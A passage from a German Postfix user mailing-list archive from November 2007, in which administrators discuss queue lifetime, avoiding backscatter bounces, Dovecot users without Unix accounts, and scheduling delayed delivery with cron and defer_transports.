at informatik.uni-hamburg.de Thu Nov 22 14:03:27 2007 From: zierke at informatik.uni-hamburg.de (Reinhard Zierke) Date: Thu, 22 Nov 2007 14:03:27 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <200711221340.54381@office.a-mazing.net> References: <4745420A.7010602@deiszner.de> <200711221234.09855@office.a-mazing.net> <47456BED.8010706@reba-eno.de> <200711221340.54381@office.a-mazing.net> Message-ID: <20071122130326.GC24812@rzdspc6.informatik.uni-hamburg.de> >> 3d ist imho vertretbar. Was bis dahin noch in der Queue liegt, ist auch >> nach 5 Tagen noch nicht draußen > > Das halt ich für etwas knapp. Es gibt auch so blöde Ereignisse wie > Feiertage. ;-) Weihnachten heuer ist toll, Sa - So - hlg.Abend (wie Sa) > - 1.Weihnacht - 2.Weihnacht, das macht fünf Tage ohne volle Besetzung. Warum nicht vor Weihnachten und anderen unerwartet auftauchenden Ergeinissen per cronjob 'postconf -ev maximal_queue_lifetime=7d' setzen? Reinhard From mrg at unimx.de Thu Nov 22 14:31:49 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 22 Nov 2007 14:31:49 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <47456235.9070706@reba-eno.de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <47456235.9070706@reba-eno.de> Message-ID: <105a01c82d0c$0bfd5b70$23f81250$@de> Danke für die Antwort 1) Nur will ich den Spam nicht schon im SMTP-Dialog ablehnen. Das hat verschiedene Gründe (z.b. User wollen Spam sehen und selber entscheiden). Im SMTP-Dialog ich schon u.a Emails ab die keine Domain haben oder Domain nicht existent ist. 2) Das mit dem Postfach voll war ein Beispiel. Nehmen wir ein anderes. Ein User leitet seine Mails an user at domain.tld nicht an ein Postfach sondern an eine externe Mailadresse (extern at domain.tld) Wenn es diese Mailadresse aber nicht mehr gibt, wird an den Absender einer Mail die an user at domain.tld geht, bebounced (ist auch gut so, solange der Absender keinen Spam schickt.) Wichtig: Wie gesagt ein Beispiel (man könnte ja regelmäßig die Weiterleitungsmails testen und wenn Domain nicht mehr aktiv die Weiterleitung löschen / allerdings sehr umständlich zb bei temp Fehlern) Meine Frage ist daher: Es geht mir nur darum, dass ich Bounces ,die eine Spammail enthalten, die aus irgendeinem Grund nicht zugestellt werden konnte, nicht gebounced werden. Wie kann ich das erreichen? So kann doch Backscatter relativ effektiv verhindert werden oder nicht? (Ich schicke mir dann eh Bouncecopies die ich dann noch durchsehen kann ob der Bounce doch raus soll (z.B. bei Fehlerhafter Markierung als Spam), dann würde ich per Hand schicken). BTW: >Und nun etwas organisatorisches. Was du noch machen kannst, definiere >zwei Mailboxfüllgrade, ab dem ersten wird der User benachrichtigt, daß >seine Mailbox nur noch xx Prozent / xx MB freien Platz hat und beim >zweiten wird nicht mehr angenommen. Das ist bereits geschehen, viele User ignorieren diese Benachrichtigung einfach. Der User ist König und es muss so einfach wie möglich sein. Ich kann mich darüber hinwegsetzen und alles sehr Straff einstellen, nur gefällt das dem User nicht und er geht halt zu einem anderen MailAnbieter. -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Peter Bauernfeind Gesendet: Donnerstag, 22. November 2007 12:04 An: Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein. Betreff: Re: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) mrg at unimx.de schrieb: > > Hallo, > > > > ihr seit es ev. leid antworten über Backscatter zu geben. > > Bevor ihr nölt: > > Mein Server ist durch ?smtpd-Restrictions? schon etwas gegen > Backscatter geschützt. > > Habe auch einige Howtos und Backscatter Infos gelesen die im Netz so > zu finden sind. Weiß also etwas bescheid. > > > > > > Folgendes Szenario (ist exemplarisch, lässt sich auch auf andere > BEREICHE portieren): > > > > Ein User auf meinem System sein Postfach ist voll. > > [anderer BEREICH: z.B. eine Weiterleitung eingerichtet die nicht mehr > existiert, Mails mit ?fi..en? reject , Abwesenheitsbenachtigung] > > > > > > Dieser User bekommt nun von einem geforgten Absender Spam-Post: > > > > forget at sender.tld -> > meinuser at meinedomain.de > > > > Per ?smtpd-Restrictions? ist diese Mail nicht ablehnbar, solange > forget at sender.tld tatsächlich existiert. > > > > > > Weg der Mail: > > > > SMTP -> a) Spamfilter (markiert den Header da ja Spam (keine > Vernichtung der Mail) ) -> Cyrus will einliefern an > meinuser at meinedomain.de und sieht > Postfach voll > > -> Mail wird gebounced mit Postfach voll > > > > So da haben wir den Salat. forget at sender.tld > bekommt tausende Bounce (typischer > Backscatter). > > > > Ist es nun nicht möglich, dass Mails die von > > > > MAILER-DAEMON at MYHOST (Mail Delivery System) oder Mail Sieve Subsystem > > > an jemanden geschickt werden UND! > > - im Inhalt die Spammarkierung enthalten (da ja eigentliche Mail > angehängt die gefilter wurde) > > => per Filter auf den schon vorhanden Spamheader (oder wie auch immer) > abzulehnen (oder z.B. an ein Sammelpostfach senden)? > > > > Es würden alle gebounced Mails die die Spammarkierung haben > aussortiert/wegsortiert. > > Das würde doch das Problem lösen, da nun kein Bounce auf eigentliche > Spammails gesendet wird? > > Wie kann ich das bewerkstelligen? > > > > Wie sieht der Weg einer SIEVE gefilterten Mail im Postfixsystem aus > (ist ja kein eigentlicher Bounce). > > > > Hinweis: > > Was nicht praktikabel ist, ist die Spammails unter a) nicht nur zu > markieren sondern zu löschen. Meine User wollen die Spams mir > markierung (werden dann per Sieve in Spamordner gepackt). > Dann nimm sie einfach nicht an. Einen Thread vorher schreibt AOL: 220-rly-ma09.mx.aol.com ESMTP mail_relay_in-ma09.7; Wed, 21 Nov 2007 13:57:25 -0500 220-America Online (AOL) and its affiliated companies do not 220- authorize the use of its proprietary computers and computer 220- networks to accept, transmit, or distribute unsolicited bulk 220- e-mail sent from the internet. Effective immediately: AOL 220- may no longer accept connections from IP addresses which 220 have no reverse-DNS (PTR record) assigned. Nimm Policyweight, Greylisting und ähnliches. > Auch nicht praktikabel ist so Spam im SMTP Dialog abzulehnen > (verschiedene Gründe ua. Sie oben). > > > Und wenn die Wanne voll ist, dann ist sie voll und läuft über wenn man sich dennoch reinsetzt. Deshalb vor Annahme der Mail prüfen und Annahme verweigern. War hier vor einigen Tagen ein Thema. Und bouncen ist nicht gut. Das Beste ist beim Empfang ablehnen. Dann weiß der Sender bzw der Verfasser der Mail, daß seine Mail nicht angenommen wurde, Fehlercode steht dabei. Notfalls kann der Sender immernoch zum Telefon greifen und nachfragen. Und nun etwas organisatorisches. Was du noch machen kannst, definiere zwei Mailboxfüllgrade, ab dem ersten wird der User benachrichtigt, daß seine Mailbox nur noch xx Prozent / xx MB freien Platz hat und beim zweiten wird nicht mehr angenommen. Nun frage ich mich allerdings welch wichtige Mails solange aufbewahrt werden müssen, daß sie die Mailbox verstopfen? Oder anders wieso werden die wichtigen Mails nichtgelesen? Oder wie kommt es behaupt dazu, daß die Mailbox überläuft? Das heißt doch, der User der Mailbox liest seine Mails nicht. Oder hat noch kein größeres Postfach bestellt. Aber alles interne organisatorische Sachen. Mit freundlichem Gruß Peter Bauernfeind From driessen at fblan.de Thu Nov 22 15:46:22 2007 From: driessen at fblan.de (Uwe Driessen) Date: Thu, 22 Nov 2007 15:46:22 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <105a01c82d0c$0bfd5b70$23f81250$@de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <47456235.9070706@reba-eno.de> <105a01c82d0c$0bfd5b70$23f81250$@de> Message-ID: <002b01c82d16$73591ed0$0565a8c0@uwe> mrg at unimx.de schrieb: > Danke für die Antwort > > 1) Nur will ich den Spam nicht schon im SMTP-Dialog ablehnen. Das hat > verschiedene Gründe (z.b. User wollen Spam sehen und selber entscheiden). > Im SMTP-Dialog ich schon u.a Emails ab die keine Domain haben oder Domain > nicht existent ist. Nun dann musst du dafür sorge tragen das die Mails auch bei dir bleiben. Grundlegende Prüfung um nicht zum Backscatter zu werden ist eigentlich schon alles genannt worden was man tun kann. Gibt es die Absender Domain, gibt es die Domain bei dir, gibt es den User alles andere anzunehmen ist eher Harakirie denn produktiv. Mit den Prüfungen wird auch sichergestellt dass man eben nicht zum Backscatter wird. Egal aus welchem Grund auch immer du jede Mail die hunz und kunz schickt annehmen willst die Verantwortung was damit passiert und das diese auch sauber zugestellt oder bei Fehlern gebounced/rejectet wird liegt bei dir. Wie du das erreichst überlässt der Gesetzgeber dir. Mit Postfix hast du die Möglichkeiten vor einer Annahme zu prüfen ob die Kommunikation vorwärts und auch rückwärts läuft oder lass es eben und riskiere damit evtl. auf RBL's zu landen. Selbst bei einer moderaten Prüfung ob eben auch im Fehlerfall sauber mit den Mails umgegangen werden kann kommt noch genug mist in die Postfächer. Policyd-weight und greylisting(evtl. sogar nur selektiv) wurden schon genannt. Wer Viag.. kaufen möchte soll in die Apotheke gehen, wem sein Teil zu klein ist soll zum Arzt gehen und wer unbedingt Fleisch sehen möchte soll die Suchmaschinen bemühen. Das was du gerne möchtest habe ich noch nicht gesehen. Ich habe bis dato noch keinen Kunden gehabt der wegen fehlendem Spam woanders hin gewechselt wäre. Eher das Gegenteil ist der Fall (aber sind ja fast nur Firmenkunden und Dialinuser die ich hier habe) Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From kildau-ml at gmx.de Thu Nov 22 16:29:29 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Thu, 22 Nov 2007 16:29:29 +0100 Subject: [Postfixbuch-users] Posftix + Dovecot virtual users Message-ID: <200711221629.30066.kildau-ml@gmx.de> Hi, ich hab' momentan ein paar Gedankenverwirrungen :) Mein Setup ist momentan as follows: fetchmail (8 accounts) -> postfix -> dovecot deliver -> imap Momentan läuft alles noch über unix passwords, weshalb ich für Postfix in der main.cf local_recipient_maps = unix:passwd.byname $alias_map habe und für Dovecot nutze ich einfach passdb pam. Nun sollen noch ein paar User (genauer 5) hinzukommen, denen ich nicht allen einen unix account geben möchte, für SQL oder LDAP ist der (Heim-) Setup meiner Meinung nach aber zu klein... Gibt's was einfacheres? Für Postfix würde ich nach lesen der Doku vermutlich local_recipient_maps = unix:passwd.byname hash:/somefilewiththerecipients nutzen, aber was ist mit Dovecot? Am liebsten hätte ich ein File mit Username + Password. Ist das alles zu viel Aufwand? Ein MySQL Server der nur an localhost lauscht und ab und an einmal ein Query bekommt ist ja eigentlich weder ein Sicherheitsrisiko, noch sonderlich Ressourcenfressend. -- Für jeden Knoten weniger dankbar ;) Chris From gregor at a-mazing.de Thu Nov 22 17:08:35 2007 From: gregor at a-mazing.de (Gregor Hermens) Date: Thu, 22 Nov 2007 17:08:35 +0100 Subject: [Postfixbuch-users] Posftix + Dovecot virtual users In-Reply-To: <200711221629.30066.kildau-ml@gmx.de> References: <200711221629.30066.kildau-ml@gmx.de> Message-ID: <200711221708.36041@office.a-mazing.net> Hallo Chris, Am Donnerstag, 22. November 2007 schrieb Chris Cohen: > Nun sollen noch ein paar User (genauer 5) hinzukommen, denen ich nicht > allen einen unix account geben möchte spricht etwas dagegen ihnen einen Unix-Account mit Login-Shell /bin/false zu geben? Gruß, Gregor -- @mazing fon +49 8142 6528665 Gregor Hermens fax +49 8142 6528669 Brucker Strasse 12 gregor.hermens at a-mazing.de D-82216 Gernlinden http://www.a-mazing.de/ From kildau-ml at gmx.de Thu Nov 22 17:15:39 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Thu, 22 Nov 2007 17:15:39 +0100 Subject: [Postfixbuch-users] Posftix + Dovecot virtual users In-Reply-To: <200711221708.36041@office.a-mazing.net> References: <200711221629.30066.kildau-ml@gmx.de> <200711221708.36041@office.a-mazing.net> Message-ID: <200711221715.39925.kildau-ml@gmx.de> On Thursday 22 November 2007 17:08:35 Gregor Hermens wrote: > Hallo Chris, > > Am Donnerstag, 22. November 2007 schrieb Chris Cohen: > > Nun sollen noch ein paar User (genauer 5) hinzukommen, denen ich nicht > > allen einen unix account geben möchte > > spricht etwas dagegen ihnen einen Unix-Account mit Login-Shell /bin/false > zu geben? Hmmm... wenns garnicht anders geht, würde ich es so machen. Aber die schönste Lösung ist es nicht. :) -- Greetings Chris From mrg at unimx.de Thu Nov 22 17:25:59 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 22 Nov 2007 17:25:59 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <002b01c82d16$73591ed0$0565a8c0@uwe> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <47456235.9070706@reba-eno.de> <105a01c82d0c$0bfd5b70$23f81250$@de> <002b01c82d16$73591ed0$0565a8c0@uwe> Message-ID: <116901c82d24$5f03b450$1d0b1cf0$@de> Danke für die ausführliche Antwort. Wenn ich im SMTP-Dialog aber testen will ob es die FROM: Emailadresse gibt. Ist dies möglich (per reject_un.... ???? ). Gibt aber der Test einen Timeout zurück, wird die Mail abgelehnt, obwohl der "FROM: Mailserver" nur ein kurzes Problem hat. Dies ist doch richtig? Grüße Martin -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Uwe Driessen Gesendet: Donnerstag, 22. November 2007 15:46 An: 'Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein.' Betreff: Re: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) mrg at unimx.de schrieb: > Danke für die Antwort > > 1) Nur will ich den Spam nicht schon im SMTP-Dialog ablehnen. Das hat > verschiedene Gründe (z.b. User wollen Spam sehen und selber entscheiden). > Im SMTP-Dialog ich schon u.a Emails ab die keine Domain haben oder Domain > nicht existent ist. Nun dann musst du dafür sorge tragen das die Mails auch bei dir bleiben. Grundlegende Prüfung um nicht zum Backscatter zu werden ist eigentlich schon alles genannt worden was man tun kann. Gibt es die Absender Domain, gibt es die Domain bei dir, gibt es den User alles andere anzunehmen ist eher Harakirie denn produktiv. Mit den Prüfungen wird auch sichergestellt dass man eben nicht zum Backscatter wird. Egal aus welchem Grund auch immer du jede Mail die hunz und kunz schickt annehmen willst die Verantwortung was damit passiert und das diese auch sauber zugestellt oder bei Fehlern gebounced/rejectet wird liegt bei dir. Wie du das erreichst überlässt der Gesetzgeber dir. Mit Postfix hast du die Möglichkeiten vor einer Annahme zu prüfen ob die Kommunikation vorwärts und auch rückwärts läuft oder lass es eben und riskiere damit evtl. auf RBL's zu landen. Selbst bei einer moderaten Prüfung ob eben auch im Fehlerfall sauber mit den Mails umgegangen werden kann kommt noch genug mist in die Postfächer. Policyd-weight und greylisting(evtl. sogar nur selektiv) wurden schon genannt. Wer Viag.. kaufen möchte soll in die Apotheke gehen, wem sein Teil zu klein ist soll zum Arzt gehen und wer unbedingt Fleisch sehen möchte soll die Suchmaschinen bemühen. Das was du gerne möchtest habe ich noch nicht gesehen. Ich habe bis dato noch keinen Kunden gehabt der wegen fehlendem Spam woanders hin gewechselt wäre. Eher das Gegenteil ist der Fall (aber sind ja fast nur Firmenkunden und Dialinuser die ich hier habe) Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From fabian at fabianluetzenkirchen.de Thu Nov 22 17:29:17 2007 From: fabian at fabianluetzenkirchen.de (=?ISO-8859-15?Q?Fabian_L=FCtzenkirchen?=) Date: Thu, 22 Nov 2007 17:29:17 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Postfix/Amavis_Mailqueue-Verh?= =?iso-8859-15?q?alten_=E4ndern?= Message-ID: <4745AE5D.6010208@fabianluetzenkirchen.de> Hi zusammen, hat sich schonmal jemand damit beschäftigt, die Mailqueue von Postfix in sofern zu manipulieren, dass mails gesammelt und erst zu einer bestimmten Zeit versandt werden, bzw. das über einen bestimmten Zeitraum hinweg der Versand nicht stattfindet? Beispiel: 1. von 2:00 bis 8:00 Uhr alles queuen, nicht relayen 2. " fetchmail ebenfalls queuen Wenn einer Hinweise diesbzgl. hätte, wäre ich sehr dankbar. so long... From ml at awinkelmann.de Thu Nov 22 17:31:52 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 22 Nov 2007 17:31:52 +0100 Subject: [Postfixbuch-users] Posftix + Dovecot virtual users In-Reply-To: <200711221629.30066.kildau-ml@gmx.de> References: <200711221629.30066.kildau-ml@gmx.de> Message-ID: <200711221731.52977.ml@awinkelmann.de> On Donnerstag, 22. November 2007, Chris Cohen wrote: > ich hab' momentan ein paar Gedankenverwirrungen :) > Mein Setup ist momentan as follows: > > fetchmail (8 accounts) -> postfix -> dovecot deliver -> imap > Momentan läuft alles noch über unix passwords, weshalb ich für Postfix in > der main.cf local_recipient_maps = unix:passwd.byname $alias_map habe und > für Dovecot nutze ich einfach passdb pam. > > Nun sollen noch ein paar User (genauer 5) hinzukommen, denen ich nicht > allen einen unix account geben möchte, für SQL oder LDAP ist der (Heim-) > Setup meiner Meinung nach aber zu klein... Gibt's was einfacheres? Für > Postfix würde ich nach lesen der Doku vermutlich > local_recipient_maps = unix:passwd.byname hash:/somefilewiththerecipients > nutzen, aber was ist mit Dovecot? Am liebsten hätte ich ein File mit > Username + Password. local_recipient_maps regelt nur wer am smtpd vorbeikommt. Was ist mit local? Was macht der mit Mails an die Adressen? Wenn es keine Accounts dafür gibt, wo sollen dann die Mails überhaupt hin? > Ist das alles zu viel Aufwand? Ein MySQL Server der nur an localhost > lauscht und ab und an einmal ein Query bekommt ist ja eigentlich weder ein > Sicherheitsrisiko, noch sonderlich Ressourcenfressend. -- Andreas From gregor at a-mazing.de Thu Nov 22 17:40:25 2007 From: gregor at a-mazing.de (Gregor Hermens) Date: Thu, 22 Nov 2007 17:40:25 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix/Amavis_Mailqueue-Verha?= =?iso-8859-1?q?lten_=E4ndern?= In-Reply-To: <4745AE5D.6010208@fabianluetzenkirchen.de> References: <4745AE5D.6010208@fabianluetzenkirchen.de> Message-ID: <200711221740.25367@office.a-mazing.net> Hallo Fabian, Am Donnerstag, 22. November 2007 schrieb Fabian Lützenkirchen: > > hat sich schonmal jemand damit beschäftigt, die Mailqueue von Postfix in > sofern zu manipulieren, dass mails gesammelt und erst zu einer > bestimmten Zeit versandt werden, bzw. das über einen bestimmten Zeitraum > hinweg der Versand nicht stattfindet? evtl. das hier: http://www.postfix.org/ETRN_README.html Gruß, Gregor -- @mazing fon +49 8142 6528665 Gregor Hermens fax +49 8142 6528669 Brucker Strasse 12 gregor.hermens at a-mazing.de D-82216 Gernlinden http://www.a-mazing.de/ From p at state-of-mind.de Thu Nov 22 17:44:24 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Thu, 22 Nov 2007 17:44:24 +0100 Subject: [Postfixbuch-users] =?utf-8?q?Postfix/Amavis_Mailqueue-Verhalten_?= =?utf-8?q?=C3=A4ndern?= In-Reply-To: <4745AE5D.6010208@fabianluetzenkirchen.de> References: <4745AE5D.6010208@fabianluetzenkirchen.de> Message-ID: <20071122164424.GA5500@state-of-mind.de> * Fabian Lützenkirchen : > Hi zusammen, > > hat sich schonmal jemand damit beschäftigt, die Mailqueue von Postfix in > sofern zu manipulieren, dass mails gesammelt und erst zu einer > bestimmten Zeit versandt werden, bzw. das über einen bestimmten Zeitraum > hinweg der Versand nicht stattfindet? Finde ein Kriterium mit dem Du die Mails erkennen kannst. Nutze ACCESS maps, um diese Mails in die HOLD-Queue zu senden. Gib die Mails dann später wieder frei. Wie automatisiert das von statten geht, hängt von Deinen Skript-Fähigkeiten ab. > Beispiel: > 1. von 2:00 bis 8:00 Uhr alles queuen, nicht relayen > 2. " fetchmail ebenfalls queuen Spiel mit $defer_transports: $man 5 postconf ... defer_transports (default: empty) The names of message delivery transports that should not deliver mail unless someone issues "sendmail -q" or equivalent. Specify zero or more names of mail delivery transports names that appear in the first field of master.cf. Example: defer_transports = smtp > > Wenn einer Hinweise diesbzgl. hätte, wäre ich sehr dankbar. > > so long... > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From p.heinlein at heinlein-support.de Thu Nov 22 17:50:01 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Thu, 22 Nov 2007 17:50:01 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix/Amavis_Mailqueue-Verha?= =?iso-8859-1?q?lten_=E4ndern?= In-Reply-To: <4745AE5D.6010208@fabianluetzenkirchen.de> References: <4745AE5D.6010208@fabianluetzenkirchen.de> Message-ID: <200711221750.01789.p.heinlein@heinlein-support.de> Am Donnerstag, 22. November 2007 17:29 schrieb Fabian Lützenkirchen: > 1. von 2:00 bis 8:00 Uhr alles queuen, nicht relayen Cronjob: postconf -e "default_transport = hold" /etc/init.d/postfix reload Und um 8:00 Uhr dann postconf -e "default_transport = smtp" /etc/init.d/postfix reload Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030 / 40 50 51 - 0 *** Fax: - 19 Die 2. Secure Linux Administration Conference am 6./7.12.2007 http://www.heinlein-support.de/slac Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From ml at awinkelmann.de Thu Nov 22 17:47:46 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 22 Nov 2007 17:47:46 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <116901c82d24$5f03b450$1d0b1cf0$@de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <002b01c82d16$73591ed0$0565a8c0@uwe> <116901c82d24$5f03b450$1d0b1cf0$@de> Message-ID: <200711221747.46797.ml@awinkelmann.de> On Donnerstag, 22. November 2007, mrg at unimx.de wrote: > Wenn ich im SMTP-Dialog aber testen will ob es die FROM: Emailadresse gibt. > Ist dies möglich (per reject_un.... ???? ). > Gibt aber der Test einen Timeout zurück, wird die Mail abgelehnt, obwohl > der "FROM: Mailserver" nur ein kurzes Problem hat. > Dies ist doch richtig? http://www.postfix.org/ADDRESS_VERIFICATION_README.html -- Andreas From kildau-ml at gmx.de Thu Nov 22 18:01:29 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Thu, 22 Nov 2007 18:01:29 +0100 Subject: [Postfixbuch-users] Posftix + Dovecot virtual users In-Reply-To: <200711221731.52977.ml@awinkelmann.de> References: <200711221629.30066.kildau-ml@gmx.de> <200711221731.52977.ml@awinkelmann.de> Message-ID: <200711221801.30020.kildau-ml@gmx.de> On Thursday 22 November 2007 17:31:52 Andreas Winkelmann wrote: > On Donnerstag, 22. November 2007, Chris Cohen wrote: > > ich hab' momentan ein paar Gedankenverwirrungen :) > > Mein Setup ist momentan as follows: > > > > fetchmail (8 accounts) -> postfix -> dovecot deliver -> imap > > Momentan läuft alles noch über unix passwords, weshalb ich für Postfix in > > der main.cf local_recipient_maps = unix:passwd.byname $alias_map habe und > > für Dovecot nutze ich einfach passdb pam. > > > > Nun sollen noch ein paar User (genauer 5) hinzukommen, denen ich nicht > > allen einen unix account geben möchte, für SQL oder LDAP ist der (Heim-) > > Setup meiner Meinung nach aber zu klein... Gibt's was einfacheres? Für > > Postfix würde ich nach lesen der Doku vermutlich > > local_recipient_maps = unix:passwd.byname hash:/somefilewiththerecipients > > nutzen, aber was ist mit Dovecot? Am liebsten hätte ich ein File mit > > Username + Password. > > local_recipient_maps regelt nur wer am smtpd vorbeikommt. Was ist mit > local? Ich nutze dovecot deliver (mailbox_command = /usr/libexec/dovecot/deliver), nicht local, für die Auslieferung. > Was macht der mit Mails an die Adressen? Wenn es keine Accounts > dafür gibt, wo sollen dann die Mails überhaupt hin? Mit deliver nach /var/mail/%user ausliefern. :-) -- Greetings Chris From ml at awinkelmann.de Thu Nov 22 17:57:50 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 22 Nov 2007 17:57:50 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix/Amavis_Mailqueue-Verha?= =?iso-8859-1?q?lten_=E4ndern?= In-Reply-To: <200711221750.01789.p.heinlein@heinlein-support.de> References: <4745AE5D.6010208@fabianluetzenkirchen.de> <200711221750.01789.p.heinlein@heinlein-support.de> Message-ID: <200711221757.50223.ml@awinkelmann.de> On Donnerstag, 22. November 2007, Peer Heinlein wrote: > Am Donnerstag, 22. November 2007 17:29 schrieb Fabian Lützenkirchen: > > 1. von 2:00 bis 8:00 Uhr alles queuen, nicht relayen > > Cronjob: > > postconf -e "default_transport = hold" > /etc/init.d/postfix reload "hold" ist nicht wirklich ein transport. > Und um 8:00 Uhr dann > > postconf -e "default_transport = smtp" > /etc/init.d/postfix reload Das was P. geschrieben hat mit defer_transports passt schon. Nur wollte der OP noch "fetchmail ebenfalls queuen" was mir aber irgendwie nichts sagt, -- Andreas From ast-postfix at treibsand.com Thu Nov 22 18:35:39 2007 From: ast-postfix at treibsand.com (Axel Steiner) Date: Thu, 22 Nov 2007 18:35:39 +0100 Subject: [Postfixbuch-users] Posftix + Dovecot virtual users In-Reply-To: <200711221629.30066.kildau-ml@gmx.de> References: <200711221629.30066.kildau-ml@gmx.de> Message-ID: Hi, > fetchmail (8 accounts) -> postfix -> dovecot deliver -> imap > Momentan läuft alles noch über unix passwords, weshalb ich für > Postfix in der > main.cf local_recipient_maps = unix:passwd.byname $alias_map habe > und für > Dovecot nutze ich einfach passdb pam. > Nun sollen noch ein paar User (genauer 5) hinzukommen, denen ich > nicht allen > einen unix account geben möchte, für SQL oder LDAP ist der (Heim-) > Setup > meiner Meinung nach aber zu klein... Gibt's was einfacheres? Für > Postfix > würde ich nach lesen der Doku vermutlich > local_recipient_maps = unix:passwd.byname hash:/ > somefilewiththerecipients > nutzen, aber was ist mit Dovecot? Am liebsten hätte ich ein File > mit Username > + Password. bei Dovecot kannst Du auch einfach eine Datei angeben, dass geht mit passwd-file (http://wiki.dovecot.org/AuthDatabase/PasswdFile). Allerdings bin ich mir grad nicht sicher, ob man Dovecot sagen kann, dass er in /etc/passwd und in der Datei nachschauen soll. Dann hast Du allerdings 2 Dateien, eine fuer Postfix und eine fuer Dovecot. Ist immer noch weniger Aufwand als ein SQL Backend ;-) Bye, Axel From mrg at unimx.de Thu Nov 22 19:15:51 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 22 Nov 2007 19:15:51 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <200711221747.46797.ml@awinkelmann.de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <002b01c82d16$73591ed0$0565a8c0@uwe> <116901c82d24$5f03b450$1d0b1cf0$@de> <200711221747.46797.ml@awinkelmann.de> Message-ID: <135c01c82d33$b8f38c10$2adaa430$@de> Danke, hatte ich schon gelesen. Nur dabei war das Problem mit den Timeouts. Mail die z.B. von einem Server kommt der temp. Offline ist, würde diese Mail ja abgelehnt. -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Andreas Winkelmann Gesendet: Donnerstag, 22. November 2007 17:48 An: postfixbuch-users at listi.jpberlin.de Betreff: Re: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) On Donnerstag, 22. November 2007, mrg at unimx.de wrote: > Wenn ich im SMTP-Dialog aber testen will ob es die FROM: Emailadresse gibt. > Ist dies möglich (per reject_un.... ???? ). > Gibt aber der Test einen Timeout zurück, wird die Mail abgelehnt, obwohl > der "FROM: Mailserver" nur ein kurzes Problem hat. > Dies ist doch richtig? http://www.postfix.org/ADDRESS_VERIFICATION_README.html -- Andreas -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From ml at awinkelmann.de Thu Nov 22 20:30:52 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 22 Nov 2007 20:30:52 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <135c01c82d33$b8f38c10$2adaa430$@de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <200711221747.46797.ml@awinkelmann.de> <135c01c82d33$b8f38c10$2adaa430$@de> Message-ID: <200711222030.52541.ml@awinkelmann.de> On Donnerstag, 22. November 2007, mrg at unimx.de wrote: > Danke, hatte ich schon gelesen. Scheinbar nicht oder nicht richtig. > Nur dabei war das Problem mit den Timeouts. > > Mail die z.B. von einem Server kommt der temp. Offline ist, würde diese > Mail ja abgelehnt. > http://www.postfix.org/ADDRESS_VERIFICATION_README.html -- Andreas From kildau-ml at gmx.de Thu Nov 22 21:05:48 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Thu, 22 Nov 2007 21:05:48 +0100 Subject: [Postfixbuch-users] Posftix + Dovecot virtual users In-Reply-To: References: <200711221629.30066.kildau-ml@gmx.de> Message-ID: <200711222105.49014.kildau-ml@gmx.de> On Thursday 22 